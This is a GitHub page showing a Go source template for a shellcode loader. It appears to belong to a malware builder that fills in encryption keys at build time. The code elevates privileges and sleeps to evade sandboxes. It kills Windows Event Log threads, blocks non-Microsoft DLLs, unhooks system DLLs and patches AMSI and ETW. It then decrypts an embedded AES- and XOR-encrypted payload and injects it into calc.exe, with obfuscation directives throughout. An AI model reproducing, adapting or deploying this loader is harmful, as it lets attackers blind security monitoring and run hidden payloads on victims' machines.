-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathtemplate.txt
223 lines (185 loc) · 6.5 KB
/
template.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
package main
import (
"crypto/aes"
"crypto/cipher"
_ "embed"
"encoding/hex"
"fmt"
"log"
"main/utils/AMSI_EDR"
"main/utils/BLOCKER"
"main/utils/CleanMemory"
"main/utils/EVENT_LOG"
"main/utils/Indirect"
"main/utils/Unhook"
"main/utils/elevation"
"math/rand"
"time"
)
//go:embed encrypted_loader.bin
var encryptedShellcode []byte
var (
aesKey, _ = hex.DecodeString("%KEYAES%")
xorKey, _ = hex.DecodeString("%KEYXOR%")
XORAESKey, _ = hex.DecodeString("%XORAESKEY%")
)
//.garble:controlflow flatten_passes=1 flatten_hardening=xor,delegate_table
func verifyDataIntegrity(data []byte, stage string) bool {
log.Printf("[*] Verifying data integrity at stage: %s", stage)
if len(data) == 0 {
log.Printf("[-] Data integrity check failed at stage: %s - Data is empty", stage)
return false
}
log.Printf("[+] Data integrity check passed at stage: %s", stage)
return true
}
//.garble:controlflow flatten_passes=1 flatten_hardening=xor,delegate_table
func aesDecrypt(ciphertext, key []byte) ([]byte, error) {
log.Printf("[*] Starting AES decryption - Input size: %d bytes", len(ciphertext))
// Ensure the decrypted AES key is of a valid size
if len(key) != 16 && len(key) != 24 && len(key) != 32 {
return nil, fmt.Errorf("[-] Invalid AES key size: %d bytes", len(key))
}
block, err := aes.NewCipher(key)
if err != nil {
log.Fatalf("[-] AES cipher creation failed: %v", err)
return nil, fmt.Errorf("[-] failed to create AES cipher: %v", err)
}
if len(ciphertext) < aes.BlockSize {
log.Fatalf("[-] Ciphertext too short: %d bytes", len(ciphertext))
return nil, fmt.Errorf("[-] ciphertext too short")
}
iv := ciphertext[:aes.BlockSize]
ciphertext = ciphertext[aes.BlockSize:]
stream := cipher.NewCFBDecrypter(block, iv)
stream.XORKeyStream(ciphertext, ciphertext)
log.Printf("[+] AES decryption completed - Output size: %d bytes", len(ciphertext))
return ciphertext, nil
}
//.garble:controlflow flatten_passes=1 flatten_hardening=xor,delegate_table
func xorDecrypt(data, key []byte) ([]byte, error) {
log.Printf("[*] Starting XOR decryption - Input size: %d bytes", len(data))
keyLen := len(key)
if keyLen == 0 {
log.Fatalf("[-] XOR decryption failed: empty key")
return nil, fmt.Errorf("[-] invalid XOR key length: key cannot be empty")
}
for i := 0; i < len(data); i++ {
data[i] ^= key[i%keyLen]
}
log.Printf("[+] XOR decryption completed - Output size: %d bytes", len(data))
return data, nil
}
//.garble:controlflow flatten_passes=1 flatten_hardening=xor,delegate_table
func decryptkey(data, key []byte) ([]byte, error) {
keyLen := len(key)
if keyLen == 0 {
log.Fatalf("[-] XOR decryption failed: empty key")
return nil, fmt.Errorf("[-] invalid XOR key length: key cannot be empty")
}
for i := 0; i < len(data); i++ {
data[i] ^= key[i%keyLen]
}
return data, nil
}
//.garble:controlflow flatten_passes=3 junk_jumps=128 block_splits=max flatten_hardening=xor,delegate_table
func main() {
log.SetFlags(0)
fmt.Println("[*] elevating process")
if err := elevation.Elevate(); err != nil {
log.Fatalf("[-] Failed to elevate process: %v", err)
return
}
fmt.Println("[+] Process elevated")
rand.Seed(time.Now().UnixNano())
sleepDuration := time.Duration(rand.Intn(15)+1) * time.Second
fmt.Printf("[+] Sleeping for %v\n", sleepDuration)
time.Sleep(sleepDuration)
fmt.Println("[+] Woke Up ... Execution Continues")
eventlogPid, err := EVENT_LOG.GetEventLogPid()
if err != nil {
log.Fatalf("[-] Failed to get Event Log PID: %v", err)
return
}
log.Printf("[+] Event Log PID: %d", eventlogPid)
err = EVENT_LOG.Phant0m(eventlogPid)
if err != nil {
log.Fatalf("[-] Failed to terminate Event Log threads: %v", err)
return
}
log.Println("[+] Successfully terminated Event Log threads")
fmt.Println("[*] Blocking non-Microsoft-signed DLLs")
if err := DLLBlocker.BlockDLLs(); err != nil {
log.Fatalf("[-] Failed to block non-Microsoft-signed DLLs: %v", err)
return
}
fmt.Println("[+] Non-Microsoft-signed DLLs blocked")
fmt.Println("[*] Unhooking DLLs")
dllsToUnhook := []string{"ntdll.dll", "kernel32.dll", "user32.dll", "advapi32.dll", "amsi.dll"}
if err := Unhook.FullUnhook(dllsToUnhook); err != nil {
log.Fatalf("[-] Failed to unhook DLLs: %v", err)
return
}
fmt.Println("[+] DLLs unhooked")
log.Printf("[*] Patching Amsi And ETW")
AMSI_EDR.ExecuteAllPatches()
log.Printf("[+] Patched Amsi And ETW")
DecryptedAESKEY, err := decryptkey(aesKey, XORAESKey)
if err != nil {
log.Fatalf("[-] Failed to decrypt AES key: %v", err)
return
}
// Decode the decrypted AES key from hex
DecryptedAESKEY, err = hex.DecodeString(string(DecryptedAESKEY))
if err != nil {
log.Fatalf("[-] Failed to decode AES key from hex: %v", err)
return
}
fmt.Println("[+] Decrypted AES key: ", string(DecryptedAESKEY))
defer CleanMemory.ZeroizeMemory(DecryptedAESKEY)
DecryptedXORKEY, err := decryptkey(xorKey, XORAESKey)
if err != nil {
log.Fatalf("[-] Failed to decrypt XOR key: %v", err)
return
}
// Decode the decrypted XOR key from hex
DecryptedXORKEY, err = hex.DecodeString(string(DecryptedXORKEY))
if err != nil {
log.Fatalf("[-] Failed to decode XOR key from hex: %v", err)
return
}
fmt.Println("[+] Decrypted XOR key: ", string(DecryptedXORKEY))
defer CleanMemory.ZeroizeMemory(DecryptedXORKEY)
if !verifyDataIntegrity(encryptedShellcode, "encrypted") {
log.Fatalf("[-] Encrypted shellcode integrity check failed.")
return
}
log.Printf("[*] Starting AES decryption")
aesDecrypted, err := aesDecrypt(encryptedShellcode, DecryptedAESKEY)
if err != nil {
log.Fatalf("[-] AES decryption failed: %v", err)
return
}
defer CleanMemory.ZeroizeMemory(aesDecrypted)
log.Printf("[*] Starting XOR decryption")
shellcode, err := xorDecrypt(aesDecrypted, DecryptedXORKEY)
if err != nil {
log.Fatalf("[-] XOR decryption failed: %v", err)
return
}
defer CleanMemory.ZeroizeMemory(shellcode)
if !verifyDataIntegrity(shellcode, "decrypted") {
log.Fatalf("[-] Decrypted shellcode integrity check failed.")
return
}
exePath := "C:\\Windows\\System32\\calc.exe"
println("[*] Injecting shellcode into process: ", exePath)
loader, err := Indirect.Init()
if err != nil {
log.Fatalf("[-] Failed to initialize shellcode loader: %v", err)
}
err = loader.InjectShellcode(shellcode, exePath)
if err != nil {
log.Fatalf("[-] Shellcode injection failed: %v", err)
}
}